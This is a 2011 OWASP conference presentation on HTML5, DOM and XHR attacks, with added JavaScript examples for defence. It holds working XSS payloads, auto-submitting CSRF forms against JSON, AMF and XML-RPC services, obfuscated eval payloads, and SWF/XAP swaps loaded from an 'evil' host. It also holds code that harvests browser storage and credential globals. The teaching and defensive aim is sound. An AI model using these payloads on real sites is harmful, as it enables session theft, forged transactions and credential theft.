Next Generation Web Attacks –
               HTML 5, DOM(L3) and XHR(L2)



                             Shreeraj Shah
                             Blueinfy Solutions Pvt. Ltd.
                             shreeraj.shah@blueinfy.net

OWASP
22nd Sept. 2011
OWASP AppSec USA 2011
                        Copyright © The OWASP Foundation
                        Permission is granted to copy, distribute and/or modify this document
                        under the terms of the OWASP License.




                        The OWASP Foundation
                        http://www.owasp.org
Who Am I?
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com


Founder & Director
   Blueinfy Solutions Pvt. Ltd.
   SecurityExposure.com
Past experience
   Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM
   (Domino Dev)
Interest
   Web security research
Published research
   Articles / Papers – Securityfocus, O'Reilly, DevX, InformIT etc.
   Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
   Advisories - .Net, Java servers etc.
   Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan,
   DeepSec etc.
Books (Author)
   Web 2.0 Security – Defending Ajax, RIA and SOA
   Hacking Web Services
   Web Hacking


Agenda

 Next Generation Application’s Attack Surface and
 Threat Model
 HTML 5 – Tags, Storage & WebSQL
 DOM – Vulnerabilities & Exploits
 Abusing Sockets, XHR & CSRF
 ClickJacking & Exploiting Rich HTML Components
 Reverse Engineering across DOM




ATTACK SURFACE AND
THREAT MODEL
Real Life Cases

 Last three years: several applications reviewed
 (Banking, Trading, Portals, Web 2.0 sites etc.)
 Interesting outcomes and stats
 Automated scanning is becoming increasingly difficult,
 and impossible in some cases
 Sites are vulnerable and easily exploitable in
 many cases




Technology Shift & Trend

 Server side components
   Presentation Layer
   Business Layer
   Data Access Layer
   Authentication
   Communication etc.
 Client side components (Browser)
   HTML 5: Storage, WebSocket, WebSQL, DOM, JS, XHR
   Flash: AMF, Flex
   Silverlight: XAML, WCF, .NET, Storage
   Mobile: Android, iPhone/iPad
   Other
 Runtime, Platform, Operating System Components
Browser Model

   Presentation:       HTML5, Silverlight (plug-in), Flash (plug-in); Mobile
   Process & Logic:    JavaScript, DOM/Events, Parser/Threads, WebSQL, Storage
   Network & Access:   XHR, WebSocket, Plug-in Sockets (Browser Native Network Services)
   Core Policies:      Same Origin Policy (SOP), Sandbox
Layers
  Presentation
    HTML5
    Silverlight
    Flash/Flex
  Process & Logic
    JavaScript, Document Object Model (DOM - 3), Events,
    Parsers/Threads etc.
  Network & Access
    XHR – Level 2
    WebSockets
    Plugin-Sockets
  Core Policies
    SOP
    Sandboxing for iframe
    Shared Resources

Application Architecture

   End Client: browser stack (Ajax, RIA (Flash), HTML / JS / DOM)
        | Internet
   Web Server -> Application Server (Data-access, Auth. Access)
        -> Database, Authentication Server
        | Internet
   Third-party web services the client also talks to: Trading, Weather,
   Email, Banking, Blog
Attack Surface Expansion

 Entry points into the client stack (Ajax, RIA (Flash), HTML / JS / DOM):
   HTTP Response variables
   JSON/XML streams
   DOM calls/events
   API streams: Open APIs and integrated streams
   Feeds and other third-party information
 Entry points into the server:
   POST name and value pairs
   QueryString
   XML/JSON etc.
   HTTP variables, Cookie etc.
   File attachments, uploads etc.
AppSec dynamics

 (figure on slide; Source - OWASP)
Integration and Communications

DOM glues everything: it integrates Flex,
Silverlight and HTML when needed
Various ways to communicate: the native browser
way (forms, script and img tags), XHR and WebSockets
Options for data sharing: JSON, XML, WCF,
AMF etc. (many more)
Browsers are supporting a new set of technologies
and exposing a larger surface



Demos

 App using DOM, AJAX and Web Services
 HTML 5 components and usage
 Fingerprinting Application Assets from DOM or
 JavaScripts
 Frameworks, Scripts, Structures, and so on –
 DWR/Struts




Threat Model

 Threats mapped onto the browser model (numbered as on the slide):
   Presentation (Events, Tags & Attributes, Thick Features)
     1  XSS abuse with tags and attributes
     7  Sandbox attacks and ClickJacking
     8  Abusing new features like drag-and-drop
   Process & Logic (WebSQL, DOM, Storage, Parser/Threads)
     2  DOM based XSS and Redirects
     3  Stealing from the storage
     4  Injecting and Exploiting WebSQL
   Network & Access (XHR, WebSocket, Plug-in Sockets; Browser Native Network Services)
     5  Abusing network API and Sockets
   Core Policies (Same Origin Policy (SOP), Sandbox)
     6  CSRF across streams
     9  Botnet/Spynet using WebWorkers
     10 Threats to widgets and mashups
Mapping top 10 – Current Context
  A1 – Injection: JSON, AMF, WCF, XML Injection along with WebSQL.
  A2 – XSS : DOM based XSS, Script injection through , Direct third party streams,
  HTML5 tags
  A3 – Broken Authentication and Session Management: Reverse Engineering
  Authentication/Authorization logic (JS, Flash or Silverlight) & LocalStorage
  A4 – Insecure Direct Object References : Insecure Data Access Level calls from
  browser.
  A5 – CSRF: CSRF with XML, JSON and AMF streams and XHR (SOP and Sharing)
  A6 – Security Misconfiguration : Insecure browsers, poor policies, trust model
  A7 – Failure to restrict URL Access : Hidden URL and resource-fetching from
  reverse engineering
  A8 – Unvalidated Redirects : DOM-based redirects and spoofing
  A9 – Insecure Crypto Storage : Local storage inside browser and Global variables
  A10 – Insufficient Transport Layer Protection : Ajax and other calls going over
  non-SSL channels.
  Mobile 10 …



HTML 5 – TAGS, STORAGE &
WEBSQL
Abusing HTML 5 Tags

  Various new tags and attributes can be abused; they may not
  be filtered or validated by filters written for the old tag set

  Media tags
<video poster=javascript:alert(document.cookie)//
<audio><source onerror="javascript:alert(document.cookie)">


  Form tags
<form><button formaction="javascript:alert(document.cookie)">foo
<body oninput=alert(document.cookie)><input autofocus>
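One way to neutralise these payloads, as an added example (not code from the slides): an attribute allowlist that drops every on* handler and any URL-valued attribute whose scheme is not http(s). Elements are modelled as {tag, attrs} objects so the logic runs in Node without a DOM; in a browser you would walk parsed elements and call removeAttribute() on what is dropped. The allowlist contents are assumptions to tune per application.

```javascript
// Added example, not from the slides: an attribute allowlist that neutralises the
// HTML 5 payloads shown above. Elements are modelled as {tag, attrs} objects so the
// logic runs in Node without a DOM. The allowlist values are assumptions.

// Attributes whose value is a URL and may therefore carry a javascript: scheme.
const URL_ATTRS = new Set(['src', 'href', 'poster', 'action', 'formaction', 'data']);

// Per-tag attribute allowlist (assumed for this example; tune per application).
// Note what is absent: every on* handler and autofocus.
const ALLOWED = {
  video: new Set(['src', 'poster', 'controls', 'width', 'height']),
  audio: new Set(['src', 'controls']),
  source: new Set(['src', 'type']),
  form: new Set(['action', 'method']),
  button: new Set(['type', 'name', 'value', 'formaction']),
  input: new Set(['type', 'name', 'value', 'placeholder']),
  body: new Set(),
};

// Scheme check after normalisation: browsers ignore leading controls and embedded
// tabs/newlines and match the scheme case-insensitively, so "\tjavaSCRIPT:" still
// executes. Only http(s) and scheme-less (relative) URLs pass.
function hasSafeScheme(value) {
  const v = String(value).replace(/[\u0000-\u0020]/g, '').toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(v);
  if (!m) return true;                       // relative URL, no scheme
  return m[1] === 'http' || m[1] === 'https';
}

// Returns the cleaned element plus the names of everything removed (for logging).
function sanitizeElement(el) {
  const tag = String(el.tag).toLowerCase();
  const allowed = ALLOWED[tag] || new Set();
  const attrs = {};
  const dropped = [];
  for (const [rawName, value] of Object.entries(el.attrs || {})) {
    const name = rawName.toLowerCase();
    if (name.startsWith('on') || !allowed.has(name)) { dropped.push(name); continue; }
    if (URL_ATTRS.has(name) && !hasSafeScheme(value)) { dropped.push(name); continue; }
    attrs[name] = value;
  }
  return { tag, attrs, dropped };
}

// Constructed inputs: the payloads from the slide as parsed attribute maps, plus a
// whitespace-obfuscated variant and a benign button for comparison.
const SAMPLES = [
  { tag: 'video', attrs: { poster: 'javascript:alert(document.cookie)//' } },
  { tag: 'source', attrs: { onerror: 'javascript:alert(document.cookie)' } },
  { tag: 'button', attrs: { formaction: 'javascript:alert(document.cookie)' } },
  { tag: 'body', attrs: { oninput: 'alert(document.cookie)' } },
  { tag: 'input', attrs: { autofocus: '', name: 'q' } },
  { tag: 'video', attrs: { poster: ' \tjavaSCRIPT:alert(1)' } },
  { tag: 'button', attrs: { formaction: '/checkout', type: 'submit' } },
];

function sanitizeAll(list) { return list.map(sanitizeElement); }
```

An allowlist is preferred over a denylist of known-bad attributes precisely because each HTML 5 revision adds new ones (formaction, autofocus, poster) that an older denylist does not know about.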


Attacking Storage

 HTML 5 adds Web Storage (localStorage and sessionStorage), an origin-scoped
 key/value store that persists beyond a single page load, on top of the
 global-scoped JavaScript variables an application already keeps
 http://www.w3.org/TR/webstorage/




Attacking Storage

 Any script running in the origin can read it, so it can be stolen
 through XSS or any other injected JavaScript
 getItem and setItem calls read and write single keys;
 length and key(i) let a payload walk everything

 XSS the box and scan through storage




DOM Storage

 Applications run with a "rich" DOM
 JavaScript sets several variables and parameters
 while loading: GLOBALS
 They hold sensitive information; what if they are
 GLOBAL and remain for the life of the
 application?
 They can be retrieved with XSS
 HTTP requests and responses go through
 JavaScript (XHR): what about those vars?

What is wrong?

 (screenshot on slide)
By default it's Global

  Here is the line of code

    // temp is never declared with var, so it becomes a property of window and the
    // clear-text credentials stay readable from any script for the life of the page
    temp = "login.do?user=" + user + "&pwd=" + pwd;   // credentials in a GET query string
    xmlhttp.open("GET", temp, true);
    xmlhttp.onreadystatechange = function () { /* handler elided on the slide */ };
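What an injected script does with that, as an added example (not code from the slides): enumerate Web Storage through the length/key/getItem API described above, then walk the global object for credential-looking names and values such as the `temp` variable. window and the two storage objects are simulated so it runs in Node; in a browser you would call stealEverything(window). Every name and value below is constructed.

```javascript
// Added example, not from the slides: what an injected script does once it runs in
// the origin: dump Web Storage, then scan globals for credential-looking strings.
// window and localStorage are simulated so it runs in Node. Values are constructed.

const SENSITIVE_NAME = /(pass|pwd|secret|token|session|auth|key)/i;
const SENSITIVE_VALUE = /[?&](pwd|pass|password|token)=/i;   // e.g. the login URL built above

// Enumerate any Storage-like object (localStorage, sessionStorage) with the spec API.
function dumpStorage(storage) {
  const items = {};
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    items[k] = storage.getItem(k);
  }
  return items;
}

// Depth-limited walk over plain objects hanging off the global object. Functions and
// cycles are skipped; a hit is a string whose name or value looks sensitive.
function scanGlobals(root, maxDepth = 2) {
  const hits = [];
  const seen = new Set();
  function walk(obj, path, depth) {
    if (obj === null || typeof obj !== 'object' || seen.has(obj) || depth > maxDepth) return;
    seen.add(obj);
    for (const name of Object.keys(obj)) {
      const value = obj[name];
      const p = path ? path + '.' + name : name;
      if (typeof value === 'string') {
        if (SENSITIVE_NAME.test(name) || SENSITIVE_VALUE.test(value)) hits.push({ path: p, value });
      } else if (typeof value === 'object') {
        walk(value, p, depth + 1);
      }
    }
  }
  walk(root, '', 0);
  return hits;
}

function stealEverything(win) {
  return {
    local: dumpStorage(win.localStorage),
    session: dumpStorage(win.sessionStorage),
    globals: scanGlobals(win),
  };
}

// Minimal in-memory Storage implementation, constructed for the example.
function makeStorage(entries) {
  const keys = Object.keys(entries);
  return {
    get length() { return keys.length; },
    key: (i) => keys[i],
    getItem: (k) => (Object.prototype.hasOwnProperty.call(entries, k) ? entries[k] : null),
  };
}

// Constructed page state mirroring the slides: the implicit global temp that still
// holds the login URL, an API key buried in a config object, and a token the
// application parked in localStorage.
const fakeWindow = {
  temp: 'login.do?user=alice&pwd=s3cret',
  app: { config: { apiKey: 'AKIA-EXAMPLE-KEY' }, items: ['a', 'b'] },
  localStorage: makeStorage({ sessionToken: 'eyJhbGciOi.example', theme: 'dark' }),
  sessionStorage: makeStorage({}),
};
```

The defensive reading is the same code run as an audit: anything this walk finds is readable by every script in the origin, including third-party widgets and analytics, and should not be there.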




DOM stealing

 It is possible to read these variables and the clear-
 text information they hold: user/pass
 Responses and tokens
 Business information
 XHR calls and HTTP request/responses
 Dummy XHR object injection (replace XMLHttpRequest so every call is logged)
 Lots of possibilities for exploitation




Demo

 DOMTracer and profiling
 Accessing username and password




SQL Injection

 WebSQL (a W3C draft that travelled with HTML 5 and shipped in
 WebKit-based browsers) gives the page a SQLite database inside the browser itself.
 Allows one-time data loading and offline
 browsing capabilities.
 Raises security concerns and adds potential injection
 points: a statement built by string concatenation is SQL injection on the client.
 Any script in the origin can call openDatabase() and executeSql()




SQL Injection

 Through JavaScript one can harvest the entire local
 database: list the tables from sqlite_master, then SELECT * from each.
 Example (screenshot on slide)
                      26
DOM – VULNERABILITIES &
EXPLOITS
DOM Architecture

 (diagram on slide)
DOM Calls

 Ajax/Flash/Silverlight – Async Calls

   Client: HTML / CSS / RIA  ->  JS / DOM  ->  XMLHttpRequest (XHR)
                                                 | asynchronous over HTTP(S)
   Server: Web Server  ->  XML / Middleware / Text  ->  Database / Resource
DOM Calls

 Stream formats the DOM consumes from those calls: JSON, XML, JS-Script,
 JS-Object, JS-Array
DOM based XSS

 It is a sleeping giant in Ajax applications
 Root cause
   DOM is already loaded
   Application is a single page and the DOM remains the same
   New information has to be injected using JavaScript calls
   such as eval() and DOM sinks such as innerHTML and document.write()
   That information comes from untrusted sources (URL, third-party streams)




Example cases

 DOM based XSS can take place in various different
 ways
 Example
   Simple DOM function using the URL to drive ajax calls
   Third party content going into the existing DOM when the call
   is not secure
   Ajax call from the application: what if we make a direct
   call to the link? JSON may cause XSS




DOM based URL parsing

 Ajax applications are already loaded and
 developers may be using a static function to pass
 arguments from the URL
 For example
    hu = window.location.search.substring(1);   // everything after "?" is attacker controlled
    Above parameter goes into the following ajax call
    eval('getProduct(' + hu + ')');              // ?1);alert(document.cookie);( breaks out of the call
    DOM based XSS




Demo

 Scanning with DOMScan
 Injecting payload in the call




Third Party Streaming

 The browser stack (Ajax, RIA (Flash/Silver), HTML / JS / DOM) pulls streams
 over the Internet from the application itself (its database, authentication,
 web services end point and application infrastructure) and from third parties:
 documents, news, mails, weather, bank/trade, RSS feeds, blogs. An attacker who
 controls or poisons any one stream reaches eval() in the client, and from
 there XSS.
Stream processing


    if (http.readyState == 4) {
        var response = http.responseText;
        var p = eval("(" + response + ")");      // sink 1: anything in the stream executes
        document.open();
        document.write(p.firstName + "<br>");    // sink 2: field values written as HTML
        document.write(p.lastName + "<br>");
        document.write(p.phoneNumbers[0]);
        document.close();
    }
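The two eval() sinks from the last two slides (URL parameter into eval, response stream into eval) next to their safe forms, as an added example (not code from the slides). getProduct and the document writes are stubbed so it runs in Node; the payloads are constructed and record into an array instead of calling alert().

```javascript
// Added example, not from the slides: URL-to-eval and stream-to-eval DOM XSS beside
// the safe replacements. getProduct is a stub; payloads are constructed.

// Stand-in for the page's real getProduct(): records what it was called with.
const calls = [];
function getProduct(id) { calls.push(id); return { id: id }; }

// --- Source 1: window.location.search ---------------------------------------
// Vulnerable (as on the slide): the raw query string is spliced into code.
function loadFromUrlUnsafe(search) {
  const hu = search.substring(1);
  return eval('getProduct(' + hu + ')');
}

// Safe: parse the parameter, validate its shape, call the function directly.
function loadFromUrlSafe(search) {
  const id = new URLSearchParams(search).get('id');
  if (id === null || !/^\d{1,9}$/.test(id)) throw new Error('invalid product id');
  return getProduct(Number(id));
}

// --- Source 2: the XHR response stream ----------------------------------------
// Vulnerable (as on the slide): eval() runs whatever the stream carries.
function parseStreamUnsafe(responseText) {
  return eval('(' + responseText + ')');
}

// Safe: JSON.parse accepts only JSON; a polluted stream raises SyntaxError.
function parseStreamSafe(responseText) {
  return JSON.parse(responseText);
}

// The second sink on that slide is document.write(p.firstName + "<br>"); even a
// well-formed JSON value can carry markup, so encode before writing as HTML
// (or assign to textContent instead of writing markup at all).
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}
function renderContact(p) {
  return [p.firstName, p.lastName, p.phoneNumbers[0]].map(escapeHtml).join('<br>');
}

// Constructed payloads. The first breaks out of getProduct(...) the way
// ?1);alert(document.cookie);( would; the second is a polluted stream:
// valid JavaScript, invalid JSON. The third is valid JSON carrying markup.
const URL_PAYLOAD = '?1);calls.push("url-pwned");(0';
const POLLUTED_STREAM = '{"firstName":"a"}); calls.push("stream-pwned"); ({"firstName":"b","lastName":"c","phoneNumbers":["1"]}';
const CLEAN_STREAM = '{"firstName":"<img src=x onerror=alert(1)>","lastName":"Doe","phoneNumbers":["555-0100"]}';
```

The three fixes are independent: validating the URL parameter closes source 1, JSON.parse closes source 2, and encoding (or textContent) closes the document.write sink, which stays exploitable through a perfectly valid JSON value if the other two are fixed alone.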
Polluting Streams

 Web client <- stream (XML / JS-Object / JS-Array / JS-Script / JSON) <- web
 server fronting several web apps and their databases. The attacker sits on the
 path (the slide shows a proxy on port 8008) and pollutes the stream; the client
 hands it to eval() and the result is XSS.
Exploiting DOM calls

  Example of vulnerable calls (sinks):
  document.write(…)
  document.writeln(…)
  document.body.innerHTML=…
  document.forms[0].action=…
  document.attachEvent(…)
  document.create…(…)
  document.execCommand(…)
  document.body. …
  window.attachEvent(…)
  document.location=…
  document.location.hostname=…
  document.location.replace(…)
  document.location.assign(…)
  document.URL=…
  window.navigate(…)
Demo

 Sample call demo
 DOMScan to identify vulnerability




Direct Ajax Call

 The Ajax function makes a back-end call
 The back-end returns a JSON stream (or another format)
 that gets injected into the DOM
 In some libraries the response content type lets the
 stream load in the browser directly (e.g. text/html rather than application/json)
 In that case the DOM processing is bypassed and the stream
 itself renders, so markup inside the JSON executes…




Demo

 DWR/JSON call – bypassing and direct stream
 access




ABUSING SOCKETS, XHR &
CSRF
Abusing network calls

 HTML 5 era browsers provide WebSocket and XHR Level 2
 calls
 They allow cross-domain calls (CORS) and persistent,
 socket-style channels (WebSocket)
 Both can be leveraged by a JavaScript payload
 Malware or a worm can use them to perform several
 scanning tasks




Internal Scanning

 Allows internal network scanning from the victim's browser (timing and
 error behaviour of connections to intranet hosts), setting up a backward
 hidden channel, and opening calls to a proxy/cache.
 Some browsers block connections to certain ports for
 security reasons.




XHR/CSRF ETC.


XHR – Level 2 calls
  XHR is now Level 2 in browsers
  Behaviour differs between browsers
  XHR Level 2 is already implemented
  Shared-resource policy implemented: CORS
  "Origin" request header, "Access-Control-*" response headers, and decisions
  based on them
  Potential abuses
     One-way stealth channel (a cross-origin POST is sent even when the
     browser withholds the response from the script)
     CSRF possible (cookies ride along only when the script sets
     withCredentials; the request still reaches the server even if the
     response is blocked)
     Header changes
  CORS - http://www.w3.org/TR/cors/ (Cross-Origin
  Resource Sharing)
CSRF

 CSRF is possible with Web 2.0 streams by
 abusing DOM calls
   XML manipulations
   CSRF with JSON
   AMFX (the XML encoding of AMF) is also an XML stream
 Attacker injects a simple HTML payload (a form with enctype text/plain)
 that initiates a request from the browser to the target cross
 domain



How it works?

 (diagram on slide)
JSON

<html>
<body>
<FORM NAME="buy" ENCTYPE="text/plain"
  action="http://192.168.100.101/json/jservice.ashx"
  METHOD="POST">
     <input type="hidden"
  name='{"id":3,"method":"getProduct","params":{ "id" : 3}}'
  value='foo'>
</FORM>
<script>document.buy.submit();</script>
</body>
</html>



HTTP Req.

POST /json/jservice.ashx HTTP/1.1
Host: 192.168.100.2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3)
   Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: text/plain
Content-Length: 57

{"id":3,"method":"getProduct","params":{ "id" : 3}}=foo


HTTP Resp.

HTTP/1.1 200 OK
Date: Sat, 17 Jul 2010 09:14:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Content-Length: 1135
{"id":3,"result":{"Products":{"columns":["product_id","product_name","product_desc_summary","product_desc","product_price","image
      _path","rebates_file"],"rows":[[3,"Doctor Zhivago","Drama / Romance","David Lean's DOCTOR ZHIVAGO is an exploration of the
      Russian Revolution as seen from the point of view of the intellectual, introspective title character (Omar Sharif). As the political
      landscape changes, and the Czarist regime comes to an end, Dr. Zhivago's relationships reflect the political turmoil raging about
      him. Though he is married, the vagaries of war lead him to begin a love affair with the beautiful Lara (Julie Christie). But he
      cannot escape the machinations of a band of selfish and cruel characters: General Strelnikov (Tom Courtenay), a Bolshevik
      General; Komarovsky (Rod Steiger), Lara's former lover; and Yevgraf (Alec Guinness), Zhivago's sinister half-brother. This epic,
      sweeping romance, told in flashback, captures the lushness of Moscow before the war and the violent social upheaval that
      followed. The film is based on the Pulitzer Prize-winning novel by Boris Pasternak.",10.99,"zhivago","zhivago.html"]]}}}


AMF

<html>
<body>
<FORM NAME="buy" ENCTYPE="text/plain"
   action="http://192.168.100.101:8080/samples/messagebroker/http"
   METHOD="POST">
     <input type="hidden" name='<amfx ver' value='"3" xmlns="http://www.macromedia.com/2005/amfx">
<body><object type="flex.messaging.messages.CommandMessage">
<traits><string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string></traits>
<object><traits/></object><null/><string/><string/>
<object><traits><string>DSId</string><string>DSMessagingVersion</string></traits>
<string>nil</string><int>1</int></object>
<string>68AFD7CE-BFE2-4881-E6FD-694A0148122B</string><int>5</int><int>0</int><int>0</int>
</object></body></amfx>'>
</FORM>
<script>document.buy.submit();</script>
</body>
</html>
XML

 <html>
 <body>
 <FORM NAME="buy" ENCTYPE="text/plain"
 action="http://trade.example.com/xmlrpc/trade.rem"
 METHOD="POST">
      <input type="hidden" name='<?xml version'
 value='"1.0"?><methodCall><methodName>stocks.buy</methodName>
 <params><param><value><string>MSFT</string></value></param>
 <param><value><double>26</double></value></param></params>
 </methodCall>'>
 </FORM>
 <script>document.buy.submit();</script>
 </body>
 </html>
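The server-side gates that stop all three form-based CSRF payloads above, plus a strict CORS decision for the XHR Level 2 case from the earlier slide, as an added example (not code from the slides). Requests are plain {method, headers, body} objects; the forged sample reproduces the text/plain POST captured on the "HTTP Req." slide, and the trusted origin and endpoint names are assumptions.

```javascript
// Added example, not from the slides: CSRF gates for JSON/AMF/XML endpoints and a
// CORS decision for XHR Level 2. Requests are plain objects; origins are assumptions.

const TRUSTED_ORIGINS = new Set(['https://app.example.com']);   // assumed host origin

function header(req, name) {
  return String(req.headers[name.toLowerCase()] || '').trim();
}

function refererOrigin(referer) {
  try { return new URL(referer).origin; } catch (e) { return ''; }
}

// All three gates are evaluated so the caller can log every reason, not just the first.
// 1. Exact media type: a <form> can only send urlencoded, multipart or text/plain, so
//    requiring application/json (or text/xml, application/x-amf) kills the trick of
//    smuggling the payload as a text/plain field name.
// 2. A custom header: forms cannot set one; the application's own XHR always does.
// 3. Origin (or Referer as a fallback) must be ours when the browser sent one.
function checkCsrf(req, expectedType) {
  const reasons = [];
  const ct = header(req, 'content-type').split(';')[0].trim().toLowerCase();
  if (ct !== expectedType) reasons.push('content-type "' + ct + '" is not ' + expectedType);
  if (header(req, 'x-requested-with') !== 'XMLHttpRequest') reasons.push('missing X-Requested-With');
  const origin = header(req, 'origin') || refererOrigin(header(req, 'referer'));
  if (origin && !TRUSTED_ORIGINS.has(origin)) reasons.push('untrusted origin ' + origin);
  return { ok: reasons.length === 0, reasons };
}

// CORS response headers for XHR Level 2: echo only an allowlisted Origin (never "*"
// together with credentials), treat the literal "null" origin as untrusted, and add
// Vary: Origin so a cache does not serve one origin's grant to another.
function corsHeaders(req) {
  const origin = header(req, 'origin');
  if (!origin || origin === 'null' || !TRUSTED_ORIGINS.has(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Access-Control-Allow-Headers': 'Content-Type, X-Requested-With',
    'Access-Control-Allow-Methods': 'POST',
    'Vary': 'Origin',
  };
}

// Constructed requests. The forged one reproduces the slide's capture: a text/plain
// body, no custom header, and no Origin header at all.
const forgedRequest = {
  method: 'POST',
  headers: { host: '192.168.100.2', 'content-type': 'text/plain', 'content-length': '57' },
  body: '{"id":3,"method":"getProduct","params":{ "id" : 3}}=foo',
};
const legitRequest = {
  method: 'POST',
  headers: {
    'content-type': 'application/json; charset=utf-8',
    'x-requested-with': 'XMLHttpRequest',
    origin: 'https://app.example.com',
  },
  body: '{"id":3,"method":"getProduct","params":{"id":3}}',
};
const crossOriginXhr = {
  method: 'POST',
  headers: { 'content-type': 'application/json', 'x-requested-with': 'XMLHttpRequest', origin: 'https://evil.example' },
  body: '{}',
};
```

The two functions work together: a cross-origin XHR that sets X-Requested-With or a JSON content type triggers a preflight, which corsHeaders answers only for trusted origins, so the browser never sends the real request; a plain form post needs no preflight but fails gates 1 and 2. Parse the body with a strict parser as well, since the captured body ends in "=foo" and only a lenient one accepts it.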
Demos

 Simple trade demo – XML-RPC call CSRF.




FLASHJACKING


Flashjacking
  It is possible to have some integrated attacks
    DOM based XSS
    CSRF
    Flash
  A DOM based issue can change the flash/swf file: it
  can be swapped at run time and the user will not
  come to know ..
  Example
    document.getElementsByName("login").item(0).src
    = "http://evil/login.swf"


Double eval – eval the eval
  Payload -
  document.getElementsByName('Login').item(0).src='http://192.168.100.200:8080/flex/Loginn/Loginn.swf'
  Converting to a double eval to inject ' and "
  etc. without writing them literally; the character codes below spell out the payload above
     eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101,109,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,48,47,102,108,101,120,47,76,111,103,105,110,110,47,76,111,103,105,110,110,46,115,119,102,39))
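A small static pass of the kind DOMScan automates, as an added example (not code from the slides or from DOMScan) serving both the "Exploiting DOM calls" sink list and the double-eval payload above: it first unfolds String.fromCharCode(...) so a payload hidden behind the double eval is inspected in decoded form, then flags the listed sinks and notes whether a known source appears on the same line. It runs over constructed JavaScript text assembled from the snippets on these slides; the sink and source patterns are a starting set, not a complete one.

```javascript
// Added example, not from the slides: decode String.fromCharCode() payloads, then
// flag DOM sinks (and same-line sources) in JavaScript text. Sample source is
// constructed from the slides' snippets.

const SINKS = [
  { name: 'document.write', re: /document\.write(?:ln)?\s*\(/ },
  { name: 'innerHTML',      re: /\.(?:inner|outer)HTML\s*=/ },
  { name: 'eval',           re: /\beval\s*\(/ },
  { name: 'location',       re: /(?:document|window)\.location(?:\.(?:href|hostname))?\s*=[^=]|location\.(?:replace|assign)\s*\(|window\.navigate\s*\(|document\.URL\s*=[^=]/ },
  { name: 'form.action',    re: /\.action\s*=[^=]/ },
  { name: 'execCommand',    re: /\.execCommand\s*\(/ },
  { name: 'attachEvent',    re: /\.attachEvent\s*\(/ },
  { name: 'src',            re: /\.src\s*=[^=]/ },   // swf/xap swapping ("flashjacking")
];
const SOURCES = /location\.(?:search|hash|href)|document\.(?:URL|referrer|cookie)|responseText|window\.name/;

// Replace every String.fromCharCode(n, n, ...) literal with the string it builds.
function unfoldFromCharCode(src) {
  return src.replace(/String\.fromCharCode\s*\(\s*([\d\s,]+)\)/g, (_, list) =>
    JSON.stringify(list.split(',').map((n) => String.fromCharCode(parseInt(n, 10))).join(''))
  );
}

// One finding per (line, sink). "tainted" is a same-line heuristic only; a value
// that flows from a source on an earlier line (hu above) needs a real dataflow pass.
function scanSinks(src) {
  const findings = [];
  unfoldFromCharCode(src).split('\n').forEach((line, i) => {
    for (const s of SINKS) {
      if (s.re.test(line)) {
        findings.push({ line: i + 1, sink: s.name, tainted: SOURCES.test(line), text: line.trim() });
      }
    }
  });
  return findings;
}

// Constructed sample: the snippets from the DOM-parsing, stream-processing and
// double-eval slides, plus one safe line (textContent) that must not be flagged.
const S = String.fromCharCode;
const SAMPLE_SOURCE = [
  'var hu = window.location.search.substring(1);',
  "eval('getProduct(' + hu + ')');",
  "var p = eval('(' + http.responseText + ')');",
  "document.write(p.firstName + '<br>');",
  "document.getElementById('out').textContent = p.lastName;",
  'eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101,109,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,48,47,102,108,101,120,47,76,111,103,105,110,110,47,76,111,103,105,110,110,46,115,119,102,39))',
].join('\n');
```

Run scanSinks over every script the page loads, third-party widgets included; the decoded text of the sixth line is what a reviewer has to read, and no pattern on the raw text would have shown the .src assignment.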
Silverlightjacking
  It is possible to have some integrated attacks
     DOM based XSS
     CSRF
     Silverlight files
  A DOM based issue can change the xap file: it can
  be swapped at run time and the user will not come to
  know ..
  Example
     document.getElementsByName("login").item(0).src
     = "http://evil/login.xap"


RICH HTML COMPONENTS


Widgets

 Widgets/Gadgets/Modules – popular with Web
 2.0 applications
 Small programs running inside the browser
 JavaScript and HTML based components
 In some cases they share the same DOM – yes,
 the same DOM
 That opens cross-widget channels
 Exploitable …


Cross DOM Access

   Widget 1 (Email Widget), Widget 2 (RSS Feed Reader) and Widget 3 (Attacker)
   all run inside one shared DOM; the attacker's widget sets the trap there.
DOM traps

 From a shared DOM it is possible to access the other widgets'
 DOM events, variables, logic etc.
 A sandbox is required at the architecture layer to
 prevent cross-widget access
 Segregating the DOM by iframe (separate origins, sandbox attribute) may help
 Flash based widgets have their own issues as
 well
 Code analysis of widgets before allowing them
 to load

